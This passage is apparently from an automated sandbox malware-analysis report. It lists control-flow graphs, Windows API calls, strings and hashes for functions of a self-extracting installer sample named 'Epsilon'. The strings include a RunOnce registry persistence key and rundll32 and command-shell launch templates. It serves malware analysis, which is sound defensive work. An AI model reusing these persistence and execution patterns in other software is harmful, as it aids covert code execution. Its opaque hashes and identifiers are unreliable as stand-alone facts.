7ff73782472d-7ff73782472f 43->48 49 7ff7378245e5-7ff7378245ec 43->49 44->20 44->43 45->39 53 7ff73782435e-7ff737824360 45->53 46->19 55 7ff7378241e3 46->55 54 7ff7378241ea-7ff7378241fb call 7ff737825050 47->54 48->24 49->48 56 7ff7378245f2-7ff737824621 RegOpenKeyExA 49->56 57 7ff737824599-7ff7378245d3 call 7ff737824dcc LocalFree 50->57 58 7ff73782437f-7ff737824381 50->58 59 7ff73782449d-7ff7378244a4 call 7ff73782473c 51->59 60 7ff7378244df-7ff7378244e9 LocalFree 51->60 52->9 52->17 53->50 63 7ff737824362-7ff737824365 call 7ff737821d28 53->63 54->9 79 7ff7378241fd-7ff73782422d CompareStringA 54->79 55->54 56->48 64 7ff737824627-7ff737824666 RegQueryValueExA 56->64 57->19 58->51 66 7ff737824387-7ff73782438e 58->66 69 7ff7378244a9-7ff7378244ab 59->69 60->19 63->39 72 7ff73782471c-7ff737824728 RegCloseKey 64->72 73 7ff73782466c-7ff73782469b memset GetSystemDirectoryA 64->73 66->51 75 7ff737824394-7ff73782439f call 7ff7378279f0 66->75 69->60 76 7ff7378244ad-7ff7378244c3 LocalFree 69->76 72->48 77 7ff73782469d-7ff7378246ae call 7ff737827ba8 73->77 78 7ff7378246b3-7ff7378246dc call 7ff73782114c 73->78 86 7ff737824574-7ff737824597 call 7ff737824dcc 75->86 87 7ff7378243a5-7ff7378243c1 GetProcAddress 75->87 76->43 81 7ff7378244c9-7ff7378244ce 76->81 77->78 89 7ff7378246e3-7ff7378246ea 78->89 79->42 81->4 99 7ff737824553-7ff73782456f LocalFree call 7ff737827700 86->99 90 7ff7378243c7-7ff737824415 87->90 91 7ff737824521-7ff73782454e call 7ff737824dcc FreeLibrary 87->91 89->89 92 7ff7378246ec-7ff737824717 RegSetValueExA 89->92 93 7ff737824417-7ff73782441b 90->93 94 7ff73782441f-7ff737824427 90->94 91->99 92->72 93->94 97 7ff737824429-7ff73782442d 94->97 98 7ff737824431-7ff737824433 94->98 97->98 101 7ff73782443d-7ff737824445 98->101 102 7ff737824435-7ff737824439 98->102 99->19 104 7ff737824447-7ff73782444b 101->104 105 7ff73782444f-7ff737824451 101->105 102->101 104->105 107 7ff73782445b-7ff73782447e 105->107 108 7ff737824453-7ff737824457 105->108 110 7ff737824480-7ff737824491 FreeLibrary 107->110 111 7ff7378244d3-7ff7378244da FreeLibrary 107->111 108->107 110->76 111->60
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2021514549.00007FF737821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF737820000, based on PE: true
                                                                                • Associated: 00000000.00000002.2021497409.00007FF737820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021532240.00007FF737829000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021548676.00007FF73782C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021563395.00007FF73782E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff737820000_Epsilon.jbxd
                                                                                Similarity
                                                                                • API ID: Resource$Free$CompareFindLibraryLocalString$AddressLoadLockProcSizeofmemcpy_smemset
                                                                                • String ID: <None>$ADMQCMD$Adv$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$Software\Microsoft\Windows\CurrentVersion\RunOnce$USRQCMD$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup0
                                                                                • API String ID: 2679723528-341215196
                                                                                • Opcode ID: 854d9c80f2254312e823b66bd278a415edc9e6cc3862270eb2c3b0832d714124
                                                                                • Instruction ID: 6a9a6bc97071ee7b7193ac3337127a1ddb227124d0b09c7c104fc6830c573232
                                                                                • Opcode Fuzzy Hash: 854d9c80f2254312e823b66bd278a415edc9e6cc3862270eb2c3b0832d714124
                                                                                • Instruction Fuzzy Hash: C1028071A0C64AA6E720AF10E8406F9BFA0FB8474AFD40135DA4D53694DF7CE966E730
                                                                                Function 00007FF737821D28 Relevance: 42.2, APIs: 16, Strings: 8, Instructions: 183registrylibrarymemoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2021514549.00007FF737821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF737820000, based on PE: true
                                                                                • Associated: 00000000.00000002.2021497409.00007FF737820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021532240.00007FF737829000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021548676.00007FF73782C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021563395.00007FF73782E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff737820000_Epsilon.jbxd
                                                                                Similarity
                                                                                • API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
                                                                                • String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup0
                                                                                • API String ID: 178549006-1709460465
                                                                                • Opcode ID: 276e9805d9b7e1d57039d94b06db834f3dbf8df68e4bbb97ed4dd8757e439085
                                                                                • Instruction ID: 0bd307f7b1ffe97a46e2469717b27b091dc452b8d48b19776c83e17ea010a51d
                                                                                • Opcode Fuzzy Hash: 276e9805d9b7e1d57039d94b06db834f3dbf8df68e4bbb97ed4dd8757e439085
                                                                                • Instruction Fuzzy Hash: 50816E32A0CA89A6EB10AF11E8402F9FFA0FB89B56F955131DA4E13754DF3CD126D750
                                                                                Function 00007FF737821684 Relevance: 37.1, APIs: 10, Strings: 11, Instructions: 350memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 144 7ff737821684-7ff7378216ce 145 7ff7378216d3-7ff7378216dd 144->145 146 7ff7378216df-7ff7378216e5 145->146 147 7ff7378216f2-7ff737821704 145->147 146->147 148 7ff7378216e7-7ff7378216f0 146->148 149 7ff737821713-7ff73782171a 147->149 150 7ff737821706-7ff737821711 147->150 148->145 148->147 151 7ff73782171e-7ff73782173c call 7ff7378215e8 149->151 150->151 154 7ff7378217aa-7ff7378217c2 151->154 155 7ff73782173e 151->155 157 7ff7378217c7-7ff7378217d1 154->157 156 7ff737821741-7ff737821748 155->156 156->156 160 7ff73782174a-7ff73782174e 156->160 158 7ff7378217d3-7ff7378217d9 157->158 159 7ff7378217e6-7ff7378217ff call 7ff737827ba8 157->159 158->159 161 7ff7378217db-7ff7378217e4 158->161 164 7ff737821804-7ff737821814 call 7ff737827d68 159->164 160->154 163 7ff737821750-7ff737821757 160->163 161->157 161->159 165 7ff737821759-7ff73782175c 163->165 166 7ff73782175e-7ff737821760 163->166 172 7ff73782181a-7ff737821847 CompareStringA 164->172 173 7ff737821a1b-7ff737821a2b call 7ff737827d68 164->173 165->166 168 7ff737821766-7ff737821776 165->168 166->154 169 7ff737821762-7ff737821764 166->169 171 7ff73782177b-7ff737821785 168->171 169->154 169->168 174 7ff737821787-7ff73782178d 171->174 175 7ff73782179a-7ff7378217a8 171->175 172->173 177 7ff73782184d-7ff737821861 GetFileAttributesA 172->177 182 7ff737821acb-7ff737821ae9 LocalAlloc 173->182 183 7ff737821a31-7ff737821a5e CompareStringA 173->183 174->175 178 7ff73782178f-7ff737821798 174->178 175->164 180 7ff737821867-7ff73782186f 177->180 181 7ff7378219f3-7ff7378219fb 177->181 178->171 178->175 180->181 184 7ff737821875-7ff737821891 call 7ff7378215e8 180->184 185 7ff737821a00-7ff737821a16 call 7ff737824dcc 181->185 188 7ff737821aeb-7ff737821aff GetFileAttributesA 182->188 189 7ff737821aa2-7ff737821aad 182->189 183->182 186 7ff737821a60-7ff737821a67 183->186 200 7ff737821893-7ff7378218b0 call 7ff7378215e8 184->200 201 7ff7378218b5-7ff7378218d1 LocalAlloc 184->201 197 7ff737821bda-7ff737821c03 call 7ff737828470 185->197 191 7ff737821a6a-7ff737821a71 186->191 193 7ff737821b7e-7ff737821b88 188->193 194 7ff737821b01-7ff737821b03 188->194 189->185 191->191 198 7ff737821a73 191->198 199 7ff737821b8f-7ff737821b99 193->199 194->193 196 7ff737821b05-7ff737821b16 194->196 203 7ff737821b1d-7ff737821b27 196->203 205 7ff737821a78-7ff737821a7f 198->205 206 7ff737821b9b-7ff737821ba1 199->206 207 7ff737821bae-7ff737821bb9 199->207 200->201 201->189 202 7ff7378218d7-7ff73782194d GetPrivateProfileIntA GetPrivateProfileStringA 201->202 210 7ff73782194f-7ff73782197f call 7ff737821008 * 2 202->210 211 7ff737821984-7ff737821993 202->211 212 7ff737821b29-7ff737821b2f 203->212 213 7ff737821b3c-7ff737821b4d 203->213 205->205 215 7ff737821a81-7ff737821aa0 LocalAlloc 205->215 206->207 216 7ff737821ba3-7ff737821bac 206->216 209 7ff737821bbc-7ff737821bcc call 7ff737822a6c 207->209 224 7ff737821bd1-7ff737821bd5 209->224 210->224 221 7ff7378219ba 211->221 222 7ff737821995-7ff7378219b8 GetShortPathNameA 211->222 212->213 219 7ff737821b31-7ff737821b3a 212->219 213->209 220 7ff737821b4f-7ff737821b52 213->220 215->189 223 7ff737821ab2-7ff737821ac6 call 7ff73782114c 215->223 216->199 216->207 219->203 219->213 220->209 226 7ff737821b54-7ff737821b7c call 7ff737821084 * 2 220->226 227 7ff7378219c1-7ff7378219ee call 7ff73782114c 221->227 222->227 223->224 224->197 226->209 227->224
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2021514549.00007FF737821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF737820000, based on PE: true
                                                                                • Associated: 00000000.00000002.2021497409.00007FF737820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021532240.00007FF737829000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021548676.00007FF73782C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021563395.00007FF73782E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff737820000_Epsilon.jbxd
                                                                                Similarity
                                                                                • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
                                                                                • String ID: .BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                                                                                • API String ID: 383838535-1383298736
                                                                                • Opcode ID: 137c5f28b5b86e8721d426d5fc1592b78fb4194462560af86aa0c2ab9f656457
                                                                                • Instruction ID: 95f304301d65915726a427729ef5187fd0614ad70c914430c5a08a085f9ad5d8
                                                                                • Opcode Fuzzy Hash: 137c5f28b5b86e8721d426d5fc1592b78fb4194462560af86aa0c2ab9f656457
                                                                                • Instruction Fuzzy Hash: 01E1AF62A0D68AA5EB11AF10D4402FABFA0EB45746FE44135DA4D03795DF3DE52BD320
                                                                                Function 00007FF7378266C4 Relevance: 35.3, APIs: 14, Strings: 6, Instructions: 299memorystringCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 238 7ff7378266c4-7ff737826724 call 7ff737825050 LocalAlloc 241 7ff737826756-7ff73782676a call 7ff737825050 238->241 242 7ff737826726-7ff737826749 call 7ff737824dcc call 7ff737827700 238->242 247 7ff73782676c-7ff7378267a3 call 7ff737824dcc LocalFree 241->247 248 7ff7378267a5-7ff7378267ea lstrcmpA LocalFree 241->248 257 7ff73782674f-7ff737826751 242->257 247->257 251 7ff737826837-7ff73782683d 248->251 252 7ff7378267ec-7ff7378267ee 248->252 258 7ff737826b14-7ff737826b38 call 7ff737827ac8 251->258 259 7ff737826843-7ff737826849 251->259 255 7ff7378267fb 252->255 256 7ff7378267f0-7ff7378267f9 252->256 260 7ff7378267fe-7ff73782680e call 7ff7378264e4 255->260 256->255 256->260 261 7ff737826b3a-7ff737826b66 call 7ff737828470 257->261 258->261 259->258 263 7ff73782684f-7ff737826870 GetTempPathA 259->263 274 7ff737826b0f-7ff737826b12 260->274 275 7ff737826814-7ff737826832 call 7ff737824dcc 260->275 265 7ff7378268ad-7ff7378268b9 263->265 266 7ff737826872-7ff73782687e call 7ff7378264e4 263->266 272 7ff7378268bc-7ff7378268bf 265->272 273 7ff737826883-7ff737826885 266->273 276 7ff7378268c4-7ff7378268ce 272->276 273->274 277 7ff73782688b-7ff737826895 call 7ff737822468 273->277 274->261 275->257 279 7ff7378268d0-7ff7378268d5 276->279 280 7ff7378268e1-7ff7378268f3 276->280 277->265 292 7ff737826897-7ff7378268a7 call 7ff7378264e4 277->292 279->280 283 7ff7378268d7-7ff7378268df 279->283 284 7ff7378268f9-7ff73782690f GetDriveTypeA 280->284 285 7ff737826adb-7ff737826b04 GetWindowsDirectoryA call 7ff737826ca4 280->285 283->276 283->280 286 7ff737826911-7ff737826914 284->286 287 7ff737826916-7ff73782692a GetFileAttributesA 284->287 285->257 297 7ff737826b0a 285->297 286->287 290 7ff737826930-7ff737826933 286->290 287->290 291 7ff7378269bd-7ff7378269d0 call 7ff737826ca4 287->291 294 7ff7378269ad 290->294 295 7ff737826935-7ff73782693f 290->295 305 7ff7378269d2-7ff7378269de call 7ff737822468 291->305 306 7ff7378269f4-7ff737826a00 call 7ff737822468 291->306 292->265 292->274 299 7ff7378269b1-7ff7378269b8 294->299 295->299 300 7ff737826941-7ff737826953 295->300 297->272 304 7ff737826ad2-7ff737826ad5 299->304 300->299 303 7ff737826955-7ff737826981 GetDiskFreeSpaceA 300->303 303->294 308 7ff737826983-7ff7378269a4 MulDiv 303->308 304->284 304->285 305->294 313 7ff7378269e0-7ff7378269f2 call 7ff737826ca4 305->313 314 7ff737826a02-7ff737826a11 GetWindowsDirectoryA 306->314 315 7ff737826a16-7ff737826a3e call 7ff737827ba8 GetFileAttributesA 306->315 308->294 311 7ff7378269a6-7ff7378269ab 308->311 311->291 311->294 313->294 313->306 314->315 320 7ff737826a40-7ff737826a53 CreateDirectoryA 315->320 321 7ff737826a55 315->321 322 7ff737826a58-7ff737826a5a 320->322 321->322 323 7ff737826a5c-7ff737826a6b 322->323 324 7ff737826a6d-7ff737826a8e SetFileAttributesA 322->324 323->304 325 7ff737826a91-7ff737826a9b 324->325 326 7ff737826a9d-7ff737826aa3 325->326 327 7ff737826aaf-7ff737826acc call 7ff7378264e4 325->327 326->327 328 7ff737826aa5-7ff737826aad 326->328 327->274 331 7ff737826ace 327->331 328->325 328->327 331->304
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2021514549.00007FF737821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF737820000, based on PE: true
                                                                                • Associated: 00000000.00000002.2021497409.00007FF737820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021532240.00007FF737829000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021548676.00007FF73782C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021563395.00007FF73782E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff737820000_Epsilon.jbxd
                                                                                Similarity
                                                                                • API ID: Resource$Free$AttributesDirectoryFileFindLoadLocal$Windows$AllocCreateDialogDiskDriveErrorIndirectLastLockMessageParamPathSizeofSpaceStringTempTypelstrcmpmemcpy_s
                                                                                • String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$RUNPROGRAM$Z$msdownld.tmp
                                                                                • API String ID: 3973824516-559629209
                                                                                • Opcode ID: d295679648a35d68ebefb1592e78e7fb96753640c5d4a5d15ac06b69cba29707
                                                                                • Instruction ID: efc6be0cd48548213f10f6cde0248a77e541a61b119dd289bf7055df7cc67aa3
                                                                                • Opcode Fuzzy Hash: d295679648a35d68ebefb1592e78e7fb96753640c5d4a5d15ac06b69cba29707
                                                                                • Instruction Fuzzy Hash: 86D17E22B1C68AA7EB10AF20D4502FAEFA1FB85742FD44135DA4E43A95DF3DD816D720
                                                                                Function 00007FF737822DB4 Relevance: 28.2, APIs: 10, Strings: 6, Instructions: 179synchronizationCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 332 7ff737822db4-7ff737822e4d call 7ff737828b09 memset * 2 call 7ff737825050 337 7ff737822e53-7ff737822e94 CreateEventA SetEvent call 7ff737825050 332->337 338 7ff7378230a5 332->338 343 7ff737822ec3-7ff737822ecb 337->343 344 7ff737822e96-7ff737822ea0 337->344 340 7ff7378230aa-7ff7378230b9 call 7ff737824dcc 338->340 345 7ff7378230be 340->345 346 7ff737822ecd-7ff737822ecf 343->346 347 7ff737822ed5-7ff737822ef0 call 7ff737825050 343->347 348 7ff737822ea2-7ff737822ebe call 7ff737824dcc 344->348 349 7ff7378230c0-7ff7378230e3 call 7ff737828470 345->349 346->347 351 7ff737822fa3-7ff737822fb3 call 7ff7378270a8 346->351 359 7ff737822efe-7ff737822f1c CreateMutexA 347->359 360 7ff737822ef2-7ff737822efc 347->360 348->345 361 7ff737822fc4-7ff737822fcb 351->361 362 7ff737822fb5-7ff737822fbf 351->362 359->351 363 7ff737822f22-7ff737822f33 GetLastError 359->363 360->348 364 7ff737822fde-7ff737822ffd FindResourceExA 361->364 365 7ff737822fcd-7ff737822fd9 call 7ff73782204c 361->365 362->340 363->351 366 7ff737822f35-7ff737822f48 363->366 368 7ff737822fff-7ff737823011 LoadResource 364->368 369 7ff737823014-7ff73782301b 364->369 365->345 370 7ff737822f4a-7ff737822f60 call 7ff737824dcc 366->370 371 7ff737822f62-7ff737822f7f call 7ff737824dcc 366->371 368->369 374 7ff737823029-7ff737823030 369->374 375 7ff73782301d-7ff737823024 #17 369->375 381 7ff737822f81-7ff737822f9e CloseHandle 370->381 371->351 371->381 378 7ff73782303a-7ff737823044 call 7ff737823bf4 374->378 379 7ff737823032-7ff737823035 374->379 375->374 378->345 384 7ff737823046-7ff737823055 378->384 379->349 381->345 384->379 385 7ff737823057-7ff737823061 384->385 385->379 386 7ff737823063-7ff73782306a 385->386 386->379 387 7ff73782306c-7ff737823073 call 7ff7378212ec 386->387 387->379 390 7ff737823075-7ff7378230a1 call 7ff737827ac8 387->390 390->345 393 7ff7378230a3 390->393 393->379
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2021514549.00007FF737821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF737820000, based on PE: true
                                                                                • Associated: 00000000.00000002.2021497409.00007FF737820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021532240.00007FF737829000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021548676.00007FF73782C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021563395.00007FF73782E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff737820000_Epsilon.jbxd
                                                                                Similarity
                                                                                • API ID: Resource$FindLoad$CreateEventmemset$CloseErrorFreeHandleLastLockMessageMutexSizeofStringVersionmemcpy_s
                                                                                • String ID: $Adv$EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK
                                                                                • API String ID: 3100096412-78895606
                                                                                • Opcode ID: 23b77a797956e355edfda7369f95b74ab6b4eb47665e611118273c2d92ba21bd
                                                                                • Instruction ID: fe1fd086dd253012cfa4fcc9ca2c261793b57cb18bd5de6fe29e58b792ff1484
                                                                                • Opcode Fuzzy Hash: 23b77a797956e355edfda7369f95b74ab6b4eb47665e611118273c2d92ba21bd
                                                                                • Instruction Fuzzy Hash: EC817A61A0C64BB6F720BB11A8147F9EE90BF88746FC04035D94D56AA5CF7CA427EB30
                                                                                Function 00007FF737826CA4 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 215windowCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 394 7ff737826ca4-7ff737826d10 GetCurrentDirectoryA SetCurrentDirectoryA 395 7ff737826d3f-7ff737826d7a GetDiskFreeSpaceA 394->395 396 7ff737826d12-7ff737826d3a call 7ff737824dcc call 7ff737827700 394->396 398 7ff737826d80-7ff737826da8 MulDiv 395->398 399 7ff737826f63-7ff737826fb8 memset call 7ff737827700 GetLastError FormatMessageA 395->399 413 7ff737826fe9 396->413 398->399 402 7ff737826dae-7ff737826de4 GetVolumeInformationA 398->402 409 7ff737826fbd-7ff737826fe4 call 7ff737824dcc SetCurrentDirectoryA 399->409 405 7ff737826de6-7ff737826e40 memset call 7ff737827700 GetLastError FormatMessageA 402->405 406 7ff737826e45-7ff737826e68 SetCurrentDirectoryA 402->406 405->409 407 7ff737826e6c-7ff737826e73 406->407 411 7ff737826e86-7ff737826e99 407->411 412 7ff737826e75-7ff737826e7a 407->412 409->413 417 7ff737826e9d-7ff737826ea0 411->417 412->411 416 7ff737826e7c-7ff737826e84 412->416 419 7ff737826feb-7ff73782701a call 7ff737828470 413->419 416->407 416->411 421 7ff737826eae-7ff737826eb2 417->421 422 7ff737826ea2-7ff737826eac 417->422 424 7ff737826ed8-7ff737826edf 421->424 425 7ff737826eb4-7ff737826ed3 call 7ff737824dcc 421->425 422->417 422->421 427 7ff737826f0e-7ff737826f1f 424->427 428 7ff737826ee1-7ff737826ee9 424->428 425->413 431 7ff737826f22-7ff737826f2a 427->431 428->427 430 7ff737826eeb-7ff737826f0c 428->430 430->431 432 7ff737826f2c-7ff737826f30 431->432 433 7ff737826f46-7ff737826f49 431->433 434 7ff737826f32 432->434 435 7ff737826f4b-7ff737826f4d 433->435 436 7ff737826f4f-7ff737826f52 433->436 437 7ff737826f54-7ff737826f5e 434->437 438 7ff737826f34-7ff737826f41 call 7ff7378224f8 434->438 435->434 436->434 437->419 438->419
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2021514549.00007FF737821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF737820000, based on PE: true
                                                                                • Associated: 00000000.00000002.2021497409.00007FF737820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021532240.00007FF737829000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021548676.00007FF73782C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021563395.00007FF73782E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff737820000_Epsilon.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                • API String ID: 4237285672-1193786559
                                                                                • Opcode ID: 49cd0adaaefc1983ba8fc555e95bfd9e5a633419e36afff043da1f8bde31fc7d
                                                                                • Instruction ID: c5890194483e7b98c1576c6a047feba118d85ab40d8f3e92b76c9c2cecd3271a
                                                                                • Opcode Fuzzy Hash: 49cd0adaaefc1983ba8fc555e95bfd9e5a633419e36afff043da1f8bde31fc7d
                                                                                • Instruction Fuzzy Hash: 30A18F36A0C646A7E720AF20E4446EAFFA0FB89745F904135DA4D43B94CF3DE42ADB10
                                                                                Function 00007FF737825D90 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 124windowCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2021514549.00007FF737821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF737820000, based on PE: true
                                                                                • Associated: 00000000.00000002.2021497409.00007FF737820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021532240.00007FF737829000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021548676.00007FF73782C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021563395.00007FF73782E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff737820000_Epsilon.jbxd
                                                                                Similarity
                                                                                • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                                                                • String ID: *MEMCAB$CABINET
                                                                                • API String ID: 1305606123-2642027498
                                                                                • Opcode ID: 12e41cc1847b5f8b0fa491761e3488ad6540e57cdb73ef1ed4f48c4a56cb0094
                                                                                • Instruction ID: 66f43a000d165236e3b462912a389bbd98e743bb38109f97ee3dd95c663d1cfe
                                                                                • Opcode Fuzzy Hash: 12e41cc1847b5f8b0fa491761e3488ad6540e57cdb73ef1ed4f48c4a56cb0094
                                                                                • Instruction Fuzzy Hash: FD511631A0DB4AA6EB10AB10E8542F5FFA0FF8974AFC49175C94D42664DF7CE026E760
                                                                                Function 00007FF7378230EC Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 151libraryfileloaderCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 525 7ff7378230ec-7ff737823114 526 7ff737823141-7ff737823148 call 7ff737825fe4 525->526 527 7ff737823116-7ff73782311c 525->527 536 7ff73782314e-7ff737823155 call 7ff7378266c4 526->536 537 7ff737823236 526->537 529 7ff73782311e call 7ff7378260a4 527->529 530 7ff737823134-7ff73782313b call 7ff737823f74 527->530 534 7ff737823123-7ff737823125 529->534 530->526 530->537 534->537 538 7ff73782312b-7ff737823132 534->538 536->537 543 7ff73782315b-7ff73782319d GetSystemDirectoryA call 7ff737827ba8 LoadLibraryA 536->543 540 7ff737823238-7ff737823258 call 7ff737828470 537->540 538->526 538->530 547 7ff7378231c9-7ff7378231de FreeLibrary 543->547 548 7ff73782319f-7ff7378231b8 GetProcAddress 543->548 549 7ff7378231e4-7ff7378231ea 547->549 550 7ff737823273-7ff737823288 SetCurrentDirectoryA 547->550 548->547 551 7ff7378231ba-7ff7378231c3 DecryptFileA 548->551 549->550 554 7ff7378231f0-7ff73782320b GetWindowsDirectoryA 549->554 552 7ff73782328a-7ff73782328f 550->552 553 7ff737823291-7ff737823297 550->553 551->547 555 7ff737823212-7ff737823230 call 7ff737824dcc call 7ff737827700 552->555 556 7ff73782332d-7ff737823335 553->556 557 7ff73782329d-7ff7378232a4 553->557 558 7ff73782325a-7ff73782326a call 7ff737826ca4 554->558 559 7ff73782320d 554->559 555->537 560 7ff737823337-7ff737823339 556->560 561 7ff737823349 556->561 562 7ff7378232a9-7ff7378232b7 557->562 569 7ff73782326f-7ff737823271 558->569 559->555 560->561 565 7ff73782333b-7ff737823342 call 7ff737822318 560->565 568 7ff73782334b-7ff737823359 561->568 562->562 566 7ff7378232b9-7ff7378232c0 562->566 578 7ff737823347 565->578 571 7ff7378232fb call 7ff737825d90 566->571 572 7ff7378232c2-7ff7378232c9 566->572 574 7ff73782335b-7ff737823361 568->574 575 7ff737823376-7ff73782337d 568->575 569->537 569->550 585 7ff737823300 571->585 572->571 579 7ff7378232cb-7ff7378232f1 call 7ff737827ac8 572->579 574->575 582 7ff737823363 call 7ff7378240c4 574->582 576 7ff737823388-7ff73782338d 575->576 577 7ff73782337f-7ff737823381 575->577 576->540 577->576 583 7ff737823383 call 7ff73782494c 577->583 578->568 588 7ff7378232f6-7ff7378232f9 579->588 590 7ff737823368-7ff73782336a 582->590 583->576 589 7ff737823302 585->589 588->589 591 7ff737823304-7ff73782330e 589->591 592 7ff737823313-7ff737823321 call 7ff73782772c 589->592 590->537 593 7ff737823370 590->593 591->537 592->537 596 7ff737823327 592->596 593->575 596->556
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2021514549.00007FF737821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF737820000, based on PE: true
                                                                                • Associated: 00000000.00000002.2021497409.00007FF737820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021532240.00007FF737829000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021548676.00007FF73782C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021563395.00007FF73782E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
